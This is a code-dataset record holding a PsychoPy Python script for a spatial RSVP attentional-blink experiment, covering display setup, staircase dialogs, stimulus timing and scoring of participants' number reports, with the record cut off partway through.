self.runner = click_testing.CliRunner()
sys.modules['handler_factory'] = mock.Mock()
if __name__ == '__main__':
tf.test.main()
| [
"[email protected]"
] | |
ea2aa7a6be899b5c63b9a6e52a3e81d525669b50 | 0ae05ab700b3a7678186d34dfb602cfe347b1377 | /AB_spatial/code/Adi_29Nov2018_10-15.py | a345273206124586a22d20773cc04768bee0372e | [
"CC-BY-4.0",
"MIT"
] | permissive | Adibuoy23/spatio_temporal_information_processing | 20c68cae4e673171c95867e2a2b444894d814104 | a16485aa2e68b1c12043a29b5c1faf56db0ae10f | refs/heads/master | 2021-08-06T13:17:24.662844 | 2020-04-22T23:53:56 | 2020-04-22T23:53:56 | 157,260,014 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 51,182 | py | # Alex Holcombe [email protected]
# See the README.md for more information: https://github.com/alexholcombe/attentional-blink/blob/master/README.md
# git remote add origin https://github.com/alexholcombe/attentional-blink.git
from __future__ import print_function
from psychopy import monitors, visual, event, data, logging, core, sound, gui
import psychopy.info
import numpy as np
from math import atan, log, ceil
from copy import deepcopy
import time
import sys
import os
import pylab
from random import shuffle
try:
from noiseStaircaseHelpers import printStaircase, toStaircase, outOfStaircase, createNoise, plotDataAndPsychometricCurve
except ImportError:
print('Could not import from noiseStaircaseHelpers.py (you need that file to be in the same directory)')
try:
import stringResponse
except ImportError:
    print('Could not import stringResponse.py (you need that file to be in the same directory)')
descendingPsycho = True
tasks = ['T1', 'T1T2']
task = tasks[1]
# THINGS THAT COULD PREVENT SUCCESS ON A STRANGE MACHINE
# same screen or external screen? Set scrn=0 if one screen. scrn=1 means display stimulus on second screen.
# widthPix, heightPix
quitFinder = False # if checkRefreshEtc, quitFinder becomes True
autopilot = False
demo = False # False
exportImages = False # quits after one trial
subject = 'Adi' # user is prompted to enter true subject name
if autopilot:
subject = 'auto'
if os.path.isdir('.'+os.sep+'data'):
dataDir = 'data'
codeDir = 'code'
logsDir = 'logs'
else:
print('"data" directory does not exist, so saving data in present working directory')
dataDir = '.'
timeAndDateStr = time.strftime("%d%b%Y_%H-%M", time.localtime())
showRefreshMisses = True # flicker fixation at refresh rate, to visualize if frames missed
feedback = False
autoLogging = False
if demo:
refreshRate = 60. # 100
staircaseTrials = 25
prefaceStaircaseTrialsN = 20 # 22
# will be recycled / not all used, as needed
prefaceStaircaseNoise = np.array([5, 20, 20, 20, 50, 50, 50, 5, 80, 80, 80, 5, 95, 95, 95])
threshCriterion = 0.58
bgColor = [-.7, -.7, -.7] # [-1,-1,-1]
cueColor = [1., 1., 1.]
letterColor = [1., 1., 1.]
cueRadius = 1.5 # 6 deg, as in Martini E2 Letters should have height of 2.5 deg
widthPix = 1680 # monitor width in pixels of Agosta
heightPix = 1050 # 800 #monitor height in pixels
monitorwidth = 47.2 # monitor width in cm
scrn = 0 # 0 to use main screen, 1 to use external screen connected to computer
fullscr = False # True to use fullscreen, False to not. Timing probably won't be quite right if fullscreen = False
allowGUI = False
if demo:
monitorwidth = 47.2 # 18.0
if exportImages:
widthPix = 1680
heightPix = 1050
monitorwidth = 47.2
fullscr = False
scrn = 0
if demo:
scrn = 0
fullscr = False
widthPix = 1680
heightPix = 1050
monitorname = 'testMonitor'
allowGUI = True
viewdist = 65.0 # cm
INS_MSG = "Welcome! Thank you for agreeing to participate in this study.\n\n"
INS_MSG += "You will be presented with two numbers embedded in a Rapid Stream of letters. Your task is to identify the two numbers.\n\n"
INS_MSG += "Your are required to fixate in the center during the experiment.\n\n"
INS_MSG += "The RSVP stream can appear anywhere along the horizontal axis in the visual field.\n\n"
INS_MSG += "Once you've identified the numbers, type them out on the keyboard after the trial ends.\n\n"
INS_MSG += "If you're feeling uncomfortable, you can press ESC key any time to stop the experiment.\n\n"
INS_MSG += "Press any key when you are ready to begin the experiment.\n\n"
pixelperdegree = widthPix / (atan(monitorwidth/viewdist) / np.pi*180)
print('pixelperdegree=', pixelperdegree)
# create a dialog from dictionary
infoFirst = {'Do staircase (only)': False, 'Check refresh etc': False,
'Fullscreen (timing errors if not)': False, 'Screen refresh rate': 60}
OK = gui.DlgFromDict(dictionary=infoFirst,
title='AB experiment OR staircase to find thresh noise level for T1 performance criterion',
order=['Do staircase (only)', 'Check refresh etc',
'Fullscreen (timing errors if not)'],
tip={
'Check refresh etc': 'To confirm refresh rate and that can keep up, at least when drawing a grating'},
# fixed=['Check refresh etc'])#this attribute can't be changed by the user
)
if not OK.OK:
print('User cancelled from dialog box')
core.quit()
doStaircase = infoFirst['Do staircase (only)']
checkRefreshEtc = infoFirst['Check refresh etc']
fullscr = infoFirst['Fullscreen (timing errors if not)']
refreshRate = infoFirst['Screen refresh rate']
if checkRefreshEtc:
quitFinder = True
if quitFinder:
import os
applescript = "\'tell application \"Finder\" to quit\'"
shellCmd = 'osascript -e '+applescript
os.system(shellCmd)
# letter size 2.5 deg
numLettersToPresent = 26
SOAms = 133 # Battelli, Agosta, Goodbourn, Holcombe mostly using 133
# Minimum SOAms should be 84 because any shorter, I can't always notice the second ring when lag1. 71 in Martini E2 and E1b (actually he used 66.6 but that's because he had a crazy refresh rate of 90 Hz)
# 23.6 in Martini E2 and E1b (actually he used 22.2 but that's because he had a crazy refresh rate of 90 Hz)
letterDurMs = 80
ISIms = SOAms - letterDurMs
letterDurFrames = int(np.floor(letterDurMs / (1000./refreshRate)))
cueDurFrames = letterDurFrames
ISIframes = int(np.floor(ISIms / (1000./refreshRate)))
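# e.g. at the assumed 60 Hz refresh (16.67 ms/frame): letterDurFrames = floor(80/16.67) = 4
# and ISIframes = floor(53/16.67) = 3, so the realised SOA is 7 frames, about 116.7 ms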
# have set ISIframes and letterDurFrames to integer that corresponds as close as possible to originally intended ms
rateInfo = 'total SOA=' + str(round((ISIframes + letterDurFrames)*1000./refreshRate, 2)) + \
' or ' + str(ISIframes + letterDurFrames) + ' frames, comprising\n'
rateInfo += 'ISIframes ='+str(ISIframes)+' or '+str(ISIframes*(1000./refreshRate))+' ms and letterDurFrames =' + \
str(letterDurFrames)+' or '+str(round(letterDurFrames*(1000./refreshRate), 2))+'ms'
logging.info(rateInfo)
print(rateInfo)
trialDurFrames = int(numLettersToPresent*(ISIframes+letterDurFrames)) # trial duration in frames
monitorname = 'testmonitor'
waitBlank = False
# relying on monitorwidth cm (39 for Mitsubishi to do deg calculations) and gamma info in calibratn
mon = monitors.Monitor(monitorname, width=monitorwidth, distance=viewdist)
mon.setSizePix((widthPix, heightPix))
units = 'deg' # 'cm'
def openMyStimWindow(): # make it a function because have to do it several times, want to be sure is identical each time
myWin = visual.Window(monitor=mon, size=(widthPix, heightPix), allowGUI=allowGUI, units=units, color=bgColor,
colorSpace='rgb', fullscr=fullscr, screen=scrn, waitBlanking=waitBlank) # Holcombe lab monitor
return myWin
myWin = openMyStimWindow()
refreshMsg2 = ''
if not checkRefreshEtc:
refreshMsg1 = 'REFRESH RATE WAS NOT CHECKED'
refreshRateWrong = False
else: # checkRefreshEtc
runInfo = psychopy.info.RunTimeInfo(
# if you specify author and version here, it overrides the automatic detection of __author__ and __version__ in your script
# author='<your name goes here, plus whatever you like, e.g., your lab or contact info>',
# version="<your experiment version info>",
win=myWin, # a psychopy.visual.Window() instance; None = default temp window used; False = no win, no win.flips()
refreshTest='grating', # None, True, or 'grating' (eye-candy to avoid a blank screen)
verbose=True, # True means report on everything
# if verbose and userProcsDetailed, return (command, process-ID) of the user's processes
userProcsDetailed=True
)
# print(runInfo)
logging.info(runInfo)
print('Finished runInfo- which assesses the refresh and processes of this computer')
#check screen refresh is what assuming it is ##############################################
Hzs = list()
myWin.flip()
myWin.flip()
myWin.flip()
myWin.flip()
myWin.setRecordFrameIntervals(True) # otherwise myWin.fps won't work
print('About to measure frame flips')
for i in range(50):
myWin.flip()
Hzs.append(myWin.fps()) # varies wildly on successive runs!
myWin.setRecordFrameIntervals(False)
# end testing of screen refresh########################################################
Hzs = np.array(Hzs)
Hz = np.median(Hzs)
msPerFrame = 1000./Hz
refreshMsg1 = 'Frames per second ~=' + str(np.round(Hz, 1))
refreshRateTolerancePct = 3
pctOff = abs((np.median(Hzs)-refreshRate) / refreshRate)
refreshRateWrong = pctOff > (refreshRateTolerancePct/100.)
if refreshRateWrong:
refreshMsg1 += ' BUT'
refreshMsg1 += ' program assumes ' + str(refreshRate)
refreshMsg2 = 'which is off by more than' + str(round(refreshRateTolerancePct, 0)) + '%!!'
else:
refreshMsg1 += ', which is close enough to desired val of ' + str(round(refreshRate, 1))
myWinRes = myWin.size
myWin.allowGUI = True
myWin.close() # have to close window to show dialog box
defaultNoiseLevel = 0.0 # to use if no staircase, can be set by user
trialsPerCondition = 5 # default value
dlgLabelsOrdered = list()
if doStaircase:
myDlg = gui.Dlg(title="Staircase to find appropriate noisePercent", pos=(200, 400))
else:
myDlg = gui.Dlg(title="RSVP experiment", pos=(200, 400))
if not autopilot:
myDlg.addField('Subject name (default="Adi"):', 'Adi', tip='or subject code')
dlgLabelsOrdered.append('subject')
if doStaircase:
easyTrialsCondText = 'Num preassigned noise trials to preface staircase with (default=' + str(
prefaceStaircaseTrialsN) + '):'
myDlg.addField(easyTrialsCondText, tip=str(prefaceStaircaseTrialsN))
dlgLabelsOrdered.append('easyTrials')
myDlg.addField('Staircase trials (default=' + str(staircaseTrials) + '):',
tip="Staircase will run until this number is reached or it thinks it has precise estimate of threshold")
dlgLabelsOrdered.append('staircaseTrials')
pctCompletedBreak = 101
else:
myDlg.addField('\tPercent noise dots=', defaultNoiseLevel, tip=str(defaultNoiseLevel))
dlgLabelsOrdered.append('defaultNoiseLevel')
myDlg.addField('Trials per condition (default=' + str(trialsPerCondition) + '):',
trialsPerCondition, tip=str(trialsPerCondition))
dlgLabelsOrdered.append('trialsPerCondition')
pctCompletedBreak = 25
myDlg.addText(refreshMsg1, color='Black')
if refreshRateWrong:
myDlg.addText(refreshMsg2, color='Red')
if refreshRateWrong:
logging.error(refreshMsg1+refreshMsg2)
else:
logging.info(refreshMsg1+refreshMsg2)
if checkRefreshEtc and (not demo) and (myWinRes != [widthPix, heightPix]).any():
msgWrongResolution = 'Screen apparently NOT the desired resolution of ' + \
str(widthPix)+'x'+str(heightPix) + ' pixels!!'
myDlg.addText(msgWrongResolution, color='Red')
logging.error(msgWrongResolution)
print(msgWrongResolution)
# color='DimGrey') color names stopped working along the way, for unknown reason
myDlg.addText('Note: to abort press ESC at a trials response screen')
myDlg.show()
if myDlg.OK: # unpack information from dialogue box
thisInfo = myDlg.data # this will be a list of data returned from each field added in order
if not autopilot:
name = thisInfo[dlgLabelsOrdered.index('subject')]
if len(name) > 0: # if entered something
subject = name # change subject default name to what user entered
if doStaircase:
if len(thisInfo[dlgLabelsOrdered.index('staircaseTrials')]) > 0:
staircaseTrials = int(thisInfo[dlgLabelsOrdered.index(
'staircaseTrials')]) # convert string to integer
print('staircaseTrials entered by user=', staircaseTrials)
logging.info('staircaseTrials entered by user=', staircaseTrials)
if len(thisInfo[dlgLabelsOrdered.index('easyTrials')]) > 0:
# convert string to integer
prefaceStaircaseTrialsN = int(thisInfo[dlgLabelsOrdered.index('easyTrials')])
print('prefaceStaircaseTrialsN entered by user=',
thisInfo[dlgLabelsOrdered.index('easyTrials')])
logging.info('prefaceStaircaseTrialsN entered by user=', prefaceStaircaseTrialsN)
else: # not doing staircase
trialsPerCondition = int(thisInfo[dlgLabelsOrdered.index(
'trialsPerCondition')]) # convert string to integer
print('trialsPerCondition=', trialsPerCondition)
logging.info('trialsPerCondition =', trialsPerCondition)
defaultNoiseLevel = int(thisInfo[dlgLabelsOrdered.index('defaultNoiseLevel')])
else:
print('User cancelled from dialog box.')
logging.flush()
core.quit()
if not demo:
allowGUI = False
myWin = openMyStimWindow()
# set up output data file, log file, copy of program code, and logging
infix = ''
if doStaircase:
infix = 'staircase_'
fileName = os.path.join(dataDir, subject + '_' + infix + timeAndDateStr)
if not demo and not exportImages:
dataFile = open(fileName+'.txt', 'w')
saveCodeCmd = 'cp \'' + \
sys.argv[0] + '\' ' + os.path.join(codeDir,
subject + '_' + infix + timeAndDateStr) + '.py'
os.system(saveCodeCmd) # save a copy of the code as it was when that subject was run
logFname = os.path.join(logsDir, subject + '_' + infix + timeAndDateStr)+'.log'
ppLogF = logging.LogFile(logFname,
filemode='w', # if you set this to 'a' it will append instead of overwriting
level=logging.INFO) # errors, data and warnings will be sent to this logfile
if demo or exportImages:
dataFile = sys.stdout
logF = sys.stdout
logging.console.setLevel(logging.ERROR) # only show this level messages and higher
# DEBUG means set console to receive nearly all messges, INFO next level, EXP, DATA, WARNING and ERROR
logging.console.setLevel(logging.ERROR)
if fullscr and not demo and not exportImages:
runInfo = psychopy.info.RunTimeInfo(
# if you specify author and version here, it overrides the automatic detection of __author__ and __version__ in your script
# author='<your name goes here, plus whatever you like, e.g., your lab or contact info>',
# version="<your experiment version info>",
win=myWin, # a psychopy.visual.Window() instance; None = default temp window used; False = no win, no win.flips()
refreshTest='grating', # None, True, or 'grating' (eye-candy to avoid a blank screen)
verbose=False, # True means report on everything
# if verbose and userProcsDetailed, return (command, process-ID) of the user's processes
userProcsDetailed=True,
# randomSeed='set:42', ## a way to record, and optionally set, a random seed of type str for making reproducible random sequences
# None -> default
# 'time' will use experimentRuntime.epoch as the value for the seed, different value each time the script is run
# 'set:time' --> seed value is set to experimentRuntime.epoch, and initialized: random.seed(info['randomSeed'])
# 'set:42' --> set & initialize to str('42'), and will give the same sequence of random.random() for all runs of the script
)
logging.info(runInfo)
logging.flush()
# create click sound for keyboard
try:
click = sound.Sound('406__tictacshutup__click-1-d.wav')
except: # in case file missing, create inferior click manually
logging.warn(
'Could not load the desired click sound file, instead using manually created inferior click')
click = sound.Sound('D', octave=4, sampleRate=22050, secs=0.015, bits=8)
if showRefreshMisses:
fixSizePix = 32 # 2.6 #make fixation bigger so flicker more conspicuous
else:
fixSizePix = 32
fixColor = [1, 1, 1]
if exportImages:
fixColor = [0, 0, 0]
# Can counterphase flicker noise texture to create salient flicker if you break fixation
fixatnNoiseTexture = np.round(np.random.rand(fixSizePix // 4, fixSizePix // 4), 0) * 2.0 - 1  # binary noise; floor division because np.random.rand requires integer dimensions
fixation = visual.PatchStim(myWin, tex=fixatnNoiseTexture, size=(
fixSizePix, fixSizePix), units='pix', mask='circle', interpolate=False, autoLog=False)
fixationBlank = visual.PatchStim(myWin, tex=-1*fixatnNoiseTexture, size=(fixSizePix, fixSizePix),
units='pix', mask='circle', interpolate=False, autoLog=False) # reverse contrast
fixationPoint = visual.PatchStim(myWin, tex='none', colorSpace='rgb', color=(
1, 1, 1), size=10, units='pix', autoLog=autoLogging)
respPromptStim = visual.TextStim(myWin, pos=(0, -.9), colorSpace='rgb', color=(1, 1, 1),
alignHoriz='center', alignVert='center', height=.1, units='norm', autoLog=autoLogging)
acceptTextStim = visual.TextStim(myWin, pos=(0, -.8), colorSpace='rgb', color=(1, 1, 1),
alignHoriz='center', alignVert='center', height=.1, units='norm', autoLog=autoLogging)
acceptTextStim.setText('Hit ENTER to accept. Backspace to edit')
respStim = visual.TextStim(myWin, pos=(0, 0), colorSpace='rgb', color=(
1, 1, 0), alignHoriz='center', alignVert='center', height=.16, units='norm', autoLog=autoLogging)
clickSound, badKeySound = stringResponse.setupSoundsForResponse()
requireAcceptance = False
nextText = visual.TextStim(myWin, pos=(0, .1), colorSpace='rgb', color=(
1, 1, 1), alignHoriz='center', alignVert='center', height=.1, units='norm', autoLog=autoLogging)
NextRemindCountText = visual.TextStim(myWin, pos=(0, .2), colorSpace='rgb', color=(
1, 1, 1), alignHoriz='center', alignVert='center', height=.1, units='norm', autoLog=autoLogging)
screenshot = False
screenshotDone = False
stimList = []
# SETTING THE CONDITIONS
possibleCue1positions = np.array([6, 8, 10, 14]) # [4,10,16,22] used in Martini E2, group 2
possibleCue2lags = np.array([1, 2, 5, 8, 10])
cueCoords = [[2, 0], [-2, 0], [6, 0], [-6, 0]]
shuffle(cueCoords)
shuffle(possibleCue1positions)
shuffle(possibleCue2lags)
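# full factorial crossing of conditions: 4 cue locations x 4 cue1 serial positions x 5 cue2 lags = 80 unique conditions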
for coords in cueCoords:
for cue1pos in possibleCue1positions:
for cue2lag in possibleCue2lags:
stimList.append({'cue1pos': cue1pos, 'cue2lag': cue2lag, 'cueCoords': coords})
# Martini E2 and also AB experiments used 400 trials total, with breaks between every 100 trials
trials = data.TrialHandler(stimList, trialsPerCondition,
method='sequential') # constant stimuli method
# independent randomization, just to create random trials for staircase phase
trialsForPossibleStaircase = data.TrialHandler(stimList, trialsPerCondition)
# summary results to print out at end
numRightWrongEachCuepos = np.zeros([len(possibleCue1positions), 1])
# summary results to print out at end
numRightWrongEachCue2lag = np.zeros([len(possibleCue2lags), 1])
logging.info('numtrials=' + str(trials.nTotal) + ' and each trialDurFrames='+str(trialDurFrames)+' or '+str(trialDurFrames*(1000./refreshRate)) +
' ms' + ' task=' + task)
def numberToLetter(number): # 0 = A, 25 = Z
# if it's not really a letter, return @
# if type(number) != type(5) and type(number) != type(np.array([3])[0]): #not an integer or numpy.int32
# return ('@')
if number < 0 or number > 25:
return ('@')
else: # it's probably a letter
try:
return chr(ord('A')+number)
        except Exception:
            return '@'
def letterToNumber(letter): # A = 0, Z = 25
# if it's not really a letter, return -999
    # HOW CAN I GENERICALLY TEST FOR LENGTH, EVEN IN CASE OF A NUMBER THAT'S NOT PART OF AN ARRAY?
try:
# if len(letter) > 1:
# return (-999)
if letter < 'A' or letter > 'Z':
return (-999)
else: # it's a letter
return ord(letter)-ord('A')
    except Exception:
        return (-999)
# print header for data file
print('experimentPhase\ttrialnum\tsubject\ttask\t', file=dataFile, end='')
print('noisePercent\t', end='', file=dataFile)
if task == 'T1':
numRespsWanted = 1
elif task == 'T1T2':
numRespsWanted = 2
for i in range(numRespsWanted):
# have to use write to avoid ' ' between successive text, at least until Python 3
dataFile.write('answerPos'+str(i)+'\t')
dataFile.write('answer'+str(i)+'\t')
dataFile.write('response'+str(i)+'\t')
dataFile.write('correct'+str(i)+'\t')
dataFile.write('responsePosRelative'+str(i)+'\t')
print('spatialPos\t', end='', file=dataFile)  # end='' keeps the whole header on one line, matching the data rows
print('timingBlips', file=dataFile)
# end of header
def oneFrameOfStim(n, cue, letterSequence, cueDurFrames, letterDurFrames, ISIframes, cuesPos, lettersDrawObjects,
noise, proportnNoise, allFieldCoords, numNoiseDots, spatialPos, correctAnswers, resetCorrectAnswers):
# defining a function to draw each frame of stim. So can call second time for tracking task response phase
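    # SOA (stimulus onset asynchrony) per item, in frames: letter duration plus inter-stimulus interval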
SOAframes = letterDurFrames+ISIframes
    cueFrames = cuesPos*SOAframes  # cuesPos holds the cued serial positions (passed in as a parameter)
letterN = int(np.floor(n/SOAframes))
frameOfThisLetter = n % SOAframes # every SOAframes, new letter
# if true, it's not time for the blank ISI. it's still time to draw the letter
showLetter = frameOfThisLetter < letterDurFrames
# print 'n=',n,' SOAframes=',SOAframes, ' letterDurFrames=', letterDurFrames, ' (n % SOAframes) =', (n % SOAframes) #DEBUGOFF
    thisLetterIdx = letterSequence[letterN]  # which letter, from A to Z (0 to 25), should be shown?
# so that any timing problems occur just as often for every frame, always draw the letter and the cue, but simply draw it in the bgColor when it's not meant to be on
cue.setLineColor(bgColor)
    for i, cueFrame in enumerate(cueFrames):  # check whether it's time for any cue
if n >= cueFrame and n < cueFrame+cueDurFrames:
# cue.setLineColor(cueColor)
cue.setPos(spatialPos)
lettersDrawObjects[thisLetterIdx].setText(correctAnswers[i])
if showLetter:
lettersDrawObjects[thisLetterIdx].setColor(letterColor)
else:
lettersDrawObjects[thisLetterIdx].setColor(bgColor)
lettersDrawObjects[thisLetterIdx].setPos(spatialPos)
lettersDrawObjects[thisLetterIdx].draw()
lettersDrawObjects[thisLetterIdx].setText(numberToLetter(thisLetterIdx))
cue.draw()
    # Not recommended because it takes longer than a frame; apparently even the shuffle does, or maybe it is the setXYs step
refreshNoise = False
if proportnNoise > 0 and refreshNoise:
if frameOfThisLetter == 0:
np.random.shuffle(allFieldCoords)
dotCoords = allFieldCoords[0:numNoiseDots]
noise.setXYs(dotCoords)
if proportnNoise > 0:
noise.draw()
return True
# #######End of function definition that displays the stimuli!!!! #####################################
#############################################################################################################################
cue = visual.Circle(myWin,
radius=cueRadius, # Martini used circles with diameter of 12 deg
lineColorSpace='rgb',
lineColor=bgColor,
lineWidth=2.0, # in pixels
units='deg',
fillColorSpace='rgb',
fillColor=None, # beware, with convex shapes fill colors don't work
# the anchor (rotation and vertices are position with respect to this)
pos=[0, 0],
interpolate=True,
autoLog=False) # this stim changes too much for autologging to be useful
fixation_center = visual.Circle(myWin,
                                 radius=0.2,  # small central fixation dot
lineColorSpace='rgb',
lineColor=[1, -1, -1],
lineWidth=2.0, # in pixels
units='deg',
fillColorSpace='rgb',
# beware, with convex shapes fill colors don't work
fillColor=[1, -1, -1],
# the anchor (rotation and vertices are position with respect to this)
pos=[0, 0],
interpolate=True,
autoLog=False) # this stim changes too much for autologging to be useful
# predraw all 26 letters
ltrHeight = 2.5 # Martini letters were 2.5deg high
lettersDrawObjects = list()
for i in range(0, 26):
letterDraw = visual.TextStim(myWin, pos=(0, 0), colorSpace='rgb', color=letterColor,
alignHoriz='center', alignVert='center', units='deg', autoLog=autoLogging)
letterDraw.setHeight(ltrHeight)
letter = numberToLetter(i)
letterDraw.setText(letter, log=False)
letterDraw.setColor(bgColor)
lettersDrawObjects.append(letterDraw)
# All noise dot coordinates ultimately in pixels, so can specify each dot is one pixel
noiseFieldWidthDeg = ltrHeight * 1.0
noiseFieldWidthPix = int(round(noiseFieldWidthDeg*pixelperdegree))
def timingCheckAndLog(ts, trialN):
# check for timing problems and log them
# ts is a list of the times of the clock after each frame
interframeIntervs = np.diff(ts)*1000
# print ' interframe intervs were ',around(interframeIntervs,1) #DEBUGOFF
    frameTimeTolerance = .3  # proportion longer than the frame period that will not count as a miss
    longFrameLimit = np.round(1000/refreshRate*(1.0+frameTimeTolerance), 2)
    idxsInterframeLong = np.where(interframeIntervs > longFrameLimit)[0]  # frames that exceeded 130% of expected duration
numCasesInterframeLong = len(idxsInterframeLong)
if numCasesInterframeLong > 0 and (not demo):
longFramesStr = 'ERROR,'+str(numCasesInterframeLong) + \
' frames were longer than '+str(longFrameLimit)+' ms'
if demo:
longFramesStr += 'not printing them all because in demo mode'
else:
longFramesStr += ' apparently screen refreshes skipped, interframe durs were:' +\
str(np.around(interframeIntervs[idxsInterframeLong], 1)
) + ' and was these frames: ' + str(idxsInterframeLong)
        if longFramesStr is not None:
logging.error('trialnum='+str(trialN)+' '+longFramesStr)
if not demo:
flankingAlso = list()
for idx in idxsInterframeLong: # also print timing of one before and one after long frame
if idx-1 >= 0:
flankingAlso.append(idx-1)
else:
flankingAlso.append(np.NaN)
flankingAlso.append(idx)
if idx+1 < len(interframeIntervs):
flankingAlso.append(idx+1)
else:
flankingAlso.append(np.NaN)
flankingAlso = np.array(flankingAlso)
                flankingAlso = flankingAlso[~np.isnan(flankingAlso)]  # remove nan values
                # cast as integers, so can use as subscripts
                flankingAlso = flankingAlso.astype(int)  # np.integer is no longer accepted as a dtype
# because this is not an essential error message, as previous one already indicates error
logging.info('flankers also='+str(np.around(interframeIntervs[flankingAlso], 1)))
# As INFO, at least it won't fill up the console when console set to WARNING or higher
return numCasesInterframeLong
# end timing check
trialClock = core.Clock()
numTrialsCorrect = 0
numTrialsApproxCorrect = 0
numTrialsEachCorrect = np.zeros(numRespsWanted)
numTrialsEachApproxCorrect = np.zeros(numRespsWanted)
nTrialsCorrectT2eachLag = np.zeros(len(possibleCue2lags))
nTrialsEachLag = np.zeros(len(possibleCue2lags))
nTrialsApproxCorrectT2eachLag = np.zeros(len(possibleCue2lags))
def do_RSVP_stim(cue1pos, spatialPos, cue2lag, proportnNoise, trialN):
# relies on global variables:
# logging, bgColor
#
cuesPos = [] # will contain the positions of all the cues (targets)
cuesPos.append(cue1pos)
if task == 'T1T2':
cuesPos.append(cue1pos+cue2lag)
cuesPos = np.array(cuesPos)
letterSequence = np.arange(0, 26)
np.random.shuffle(letterSequence)
correctAnswers = np.random.choice(np.arange(10), size=len(
cuesPos), replace=False) # np.array(letterSequence[cuesPos])
resetCorrectAnswers = np.array(letterSequence[cuesPos])
noise = None
allFieldCoords = None
numNoiseDots = 0
if proportnNoise > 0: # generating noise is time-consuming, so only do it once per trial. Then shuffle noise coordinates for each letter
(noise, allFieldCoords, numNoiseDots) = createNoise(
proportnNoise, myWin, noiseFieldWidthPix, bgColor)
    # I don't know why this works, but without drawing it I get a consistent timing blip the first time ringInnerR is drawn for phantom contours
preDrawStimToGreasePipeline = list()
cue.setLineColor(bgColor)
preDrawStimToGreasePipeline.extend([cue])
for stim in preDrawStimToGreasePipeline:
stim.draw()
myWin.flip()
myWin.flip()
# end preparation of stimuli
framesSaved = 0
core.wait(.1)
trialClock.reset()
fixatnPeriodMin = 0.3
    # random interval between 300 ms and 800 ms (changed when Fahed ran outer ring ident)
fixatnPeriodFrames = int((np.random.rand(1)/2.+fixatnPeriodMin) * refreshRate)
ts = list() # to store time of each drawing, to check whether skipped frames
for i in range(fixatnPeriodFrames+20): # prestim fixation interval
# if i%4>=2 or demo or exportImages: #flicker fixation on and off at framerate to see when skip frame
# fixation.draw()
# else: fixationBlank.draw()
fixationPoint.draw()
myWin.flip() # end fixation interval
# myWin.setRecordFrameIntervals(True); #can't get it to stop detecting superlong frames
fixation_center.setAutoDraw(True)
myWin.flip()
t0 = trialClock.getTime()
for n in range(trialDurFrames): # this is the loop for this trial's stimulus!
worked = oneFrameOfStim(n, cue, letterSequence, cueDurFrames, letterDurFrames, ISIframes, cuesPos, lettersDrawObjects,
noise, proportnNoise, allFieldCoords, numNoiseDots, spatialPos, correctAnswers, resetCorrectAnswers) # draw letter and possibly cue and noise on top
if exportImages:
myWin.getMovieFrame(buffer='back') # for later saving
framesSaved += 1
myWin.flip()
t = trialClock.getTime()-t0
ts.append(t)
fixation_center.setAutoDraw(False)
myWin.flip()
# end of big stimulus loop
myWin.setRecordFrameIntervals(False)
if task == 'T1':
respPromptStim.setText('Which letter was circled?', log=False)
elif task == 'T1T2':
respPromptStim.setText('What are the two numbers?', log=False)
else:
respPromptStim.setText('Error: unexpected task', log=False)
postCueNumBlobsAway = -999 # doesn't apply to non-tracking and click tracking task
return letterSequence, cuesPos, correctAnswers, resetCorrectAnswers, ts
def handleAndScoreResponse(passThisTrial, responses, responsesAutopilot, task, letterSequence, cuesPos, correctAnswers, spatialPos):
#Handle response, calculate whether correct, ########################################
if autopilot or passThisTrial:
responses = responsesAutopilot
eachCorrect = np.zeros(len(correctAnswers))
eachApproxCorrect = np.zeros(len(correctAnswers))
posOfResponse = np.zeros(len(cuesPos))
responsePosRelative = np.zeros(len(cuesPos))
for i in range(len(cuesPos)): # score response to each cue
if correctAnswers[i] == int(responses[i]):
print(correctAnswers[i], responses[i])
eachCorrect[i] = 1
posThisResponse = np.where(letterToNumber(responses[i]) == letterSequence)
# print 'responses=',responses,'posThisResponse raw=',posThisResponse, ' letterSequence=',letterSequence #debugOFF
        # list with potentially two entries; we want the first, which is the array of places where the response was found in the letter sequence
posThisResponse = posThisResponse[0]
if len(posThisResponse) > 1:
logging.error('Expected response to have occurred in only one position in stream')
        if len(posThisResponse) == 0:  # response not found in letter sequence (len replaces the removed np.alen)
posThisResponse = -999
logging.warn('Response was not present in the stimulus stream')
else:
posThisResponse = posThisResponse[0]
posOfResponse[i] = posThisResponse
responsePosRelative[i] = posOfResponse[i] - cuesPos[i]
        # Vul et al.-style efficacy measure: count as approximately correct when within plus or minus 3 serial positions
        eachApproxCorrect[i] += abs(responsePosRelative[i]) <= 3
for i in range(len(cuesPos)): # print response stuff to dataFile
# header was answerPos0, answer0, response0, correct0, responsePosRelative0
print(cuesPos[i], '\t', end='', file=dataFile)
answerCharacter = numberToLetter(letterSequence[cuesPos[i]])
print(correctAnswers[i], '\t', end='', file=dataFile) # answer0
print(responses[i], '\t', end='', file=dataFile) # response0
print(eachCorrect[i], '\t', end='', file=dataFile) # correct0
print(responsePosRelative[i], '\t', end='', file=dataFile) # responsePosRelative0
correct = eachCorrect.all()
T1approxCorrect = eachApproxCorrect[0]
print(spatialPos, '\t', end='', file=dataFile)
return correct, eachCorrect, eachApproxCorrect, T1approxCorrect, passThisTrial, expStop
# end handleAndScoreResponses
def play_high_tone_correct_low_incorrect(correct, passThisTrial=False):
highA = sound.Sound('G', octave=5, sampleRate=6000, secs=.3, bits=8)
low = sound.Sound('F', octave=3, sampleRate=6000, secs=.3, bits=8)
highA.setVolume(0.9)
low.setVolume(1.0)
if correct:
highA.play()
elif passThisTrial:
high = sound.Sound('G', octave=4, sampleRate=2000, secs=.08, bits=8)
for i in range(2):
high.play()
low.play()
else: # incorrect
low.play()
def display_message(win, txt, msg):
"""A function to display text to the experiment window.
win: psychopy.visual.Window
The window to write the message to.
txt: psychopy.visual.TextStim
The text object to present to the screen.
msg: String
The contents for the text object.
"""
txt.setText(msg)
txt.setAutoDraw(True)
win.flip()
event.waitKeys()
txt.setAutoDraw(False)
win.flip()
TEXT_HEIGHT = 0.5 # The height in visual degrees of instruction text
TEXT_WRAP = 30 # The character limit of each line of text before word wrap
display_text = visual.TextStim(
win=myWin,
ori=0,
name='text',
text="",
font='Arial',
    pos=[0, 0],
wrapWidth=TEXT_WRAP,
height=TEXT_HEIGHT,
color=[1, 1, 1],
colorSpace='rgb',
opacity=1,
depth=-1.0)
# Present instructions for the experiment
display_message(myWin, display_text, INS_MSG)
expStop = False
framesSaved = 0
nDoneMain = -1 # change to zero once start main part of experiment
if doStaircase:
# create the staircase handler
useQuest = True
if useQuest:
staircase = data.QuestHandler(startVal=95,
startValSd=80,
